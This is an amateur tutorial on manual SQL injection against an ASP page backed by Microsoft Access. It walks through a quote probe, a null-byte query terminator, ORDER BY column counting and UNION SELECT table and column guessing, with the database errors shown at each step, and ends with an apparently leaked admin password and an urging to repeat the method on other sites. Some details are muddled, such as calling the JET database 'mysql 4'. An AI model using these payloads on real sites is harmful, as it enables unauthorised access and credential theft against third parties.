MS-Access Injection -Tutorial

1. So we will start Our Injecting Manually.First we have to check if Our Target site is Vulnerable .So we will use Regular injecting Type and add Single Quote ' at the end of the Parameter.
2.  
3. and Execute the URL
4.  
5. http://www.Vuln-Site.com/dettaglio-news.asp?ID=341'
6. Here we got The ERROR ! !
7.  
8. ERROR:
9. Microsoft JET Database Engine error '80040e14'
10. Syntax error in string in query expression 'ID =341''.
11. /dettaglio-news.asp, line 91
12. So Our Target is Vulnerable.Before Starting Other Process first we have To balance our query.We will use Different Comments for balancing Our Query.
13.  
14. http://www.Vuln-Site.com/dettaglio-news.asp?ID=341--+ Error !
15.  
16. ERROR:Syntax error (missing operator) in query expression 'ID =341--'.
17.  
18. http://www.Vuln-Site.com/dettaglio-news.asp?ID=341-- Again Error !!
19.  
20. Now Let's Check the null-byte " ;% 00 "
21. http://www.Vuln-Site.com/dettaglio-news.asp?ID=341;% 00 Error Gone!!
22. so will continue our Injecting With using Null-Byte at the end of the Parameter.
23.  
24. Now we have to Count the Total number of Columns .So For This Purpose we will use Normally ORDER BY command.
25. Let's Check Total Number of Columns:
26. http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 order by 1;% 00
27. No Error. Page Loaded Normally !
28.  
29. http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 order by 5;% 00
30. Again No Error !
31.  
32. http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 order by 8;% 00
33. Again page Loaded Normally !
34.  
35. but at order by 9 we have got the ERROR !
36. http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 order by 9;% 00
37.  
38. ERROR:
39. Microsoft JET Database Engine error '80040e14'
40. The Microsoft Jet database engine does not recognize '9' as a valid field name or expression.
41. /dettaglio-news.asp, line 91
42. So There are 8 Columns .
43. Now Let's Prepare our UNION BASED command.
44. After Executing The UNION BASED query We have Got ERROR:
45. http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select 1,2,3,4,5,6,7,8;% 00
46.  
47. ERROR:
48. Microsoft JET Database Engine error '80004005'
49. Query input must contain at least one table or query.
50. /dettaglio-news.asp, line 91
51. Here Comes The Main part.As our columns count is correct.so it seems to be Database is mysql 4.
52. Now we Have to Guess the Tables and Columns.So First we will Guess the Tables.
53.  
54. http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select 1,2,3,4,5,6,7,8 from Login;% 00
55. it gives us ERROR!
56.  
57. ERROR:
58. Microsoft JET Database Engine error '80040e37'
59. The Microsoft Jet database engine cannot find the input table or query 'login'. Make sure it exists and that its name is spelled correctly.
60. /dettaglio-news.asp, line 91
61. it Mean this table is not Exist.Let's Try another.
62. http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select 1,2,3,4,5,6,7,8 from tabladmin;% 00
63. Still The Same ERROR!!
64. But when we try Table ADMIN the Error is Gone.
65. http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select 1,2,3,4,5,6,7,8 from admin;% 00
66. At the Table ADMIN the Error is gone and we can see the Vulnerable Columns on the Web Page .
67.  
68. You can see the 2,3,6 are the Vulnerable Columns.so now we have to Guess The Columns.We will put our columns in these Vulnerable Columns.
69. http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select 1,2,admin_id,4,5,6,7,8 from admin;% 00
70. It Gives us Error !
71.  
72. it Gives us Password="bEx0Th6
73. So we will do the same for other sites to injecting into database.